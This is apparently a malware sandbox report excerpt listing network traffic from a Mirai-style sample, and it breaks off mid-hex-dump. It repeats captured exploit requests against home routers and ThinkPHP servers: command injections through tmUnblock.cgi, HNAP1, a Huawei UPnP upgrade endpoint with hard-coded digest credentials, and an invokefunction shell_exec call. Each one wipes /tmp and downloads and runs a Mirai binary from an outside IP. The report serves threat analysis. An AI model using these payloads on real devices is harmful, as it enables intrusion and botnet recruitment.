Source: unknown | Network traffic detected: HTTP traffic on port 54388 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 50528 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 43136 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 53950 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 35474 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 36346 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 60284 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 57332 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 53974 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 36346 |
Source: unknown | Network traffic detected: HTTP traffic on port 50564 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 33078 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 54420 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 43168 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 33098 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 37714 -> 55555 |
Source: unknown | Network traffic detected: HTTP traffic on port 35480 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 41334 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 42792 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 34658 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 43720 -> 55555 |
Source: unknown | Network traffic detected: HTTP traffic on port 58186 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 34690 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 41434 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 36370 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 33008 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 42874 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 41680 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 58228 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 41476 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 58800 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 36370 |
Source: unknown | Network traffic detected: HTTP traffic on port 47628 -> 55555 |
Source: unknown | Network traffic detected: HTTP traffic on port 33058 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 41730 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 38166 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 58854 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 45608 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 38154 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 56738 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 59448 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 48888 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 43996 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 45648 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 56794 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 48946 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 49600 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 44052 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 59502 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 59448 |
Source: unknown | Network traffic detected: HTTP traffic on port 54494 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 58800 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 59502 |
Source: unknown | Network traffic detected: HTTP traffic on port 37714 -> 55555 |
Source: unknown | Network traffic detected: HTTP traffic on port 47628 -> 55555 |
Source: unknown | Network traffic detected: HTTP traffic on port 57316 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 41334 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 57332 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 51864 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 47628 -> 55555 |
Source: unknown | Network traffic detected: HTTP traffic on port 44326 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 53836 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 53844 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 56100 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 44364 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 47838 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 51802 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 47848 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 50866 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 57938 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 58112 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 48586 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 59124 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 35322 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 52496 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 49436 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 47702 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 48624 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 35362 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 7547 -> 35322 |
Source: unknown | Network traffic detected: HTTP traffic on port 33498 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 51278 -> 7547 |
Source: unknown | Network traffic detected: HTTP traffic on port 55808 -> 55555 |
Source: unknown | Network traffic detected: HTTP traffic on port 50914 -> 7547 |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflate |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 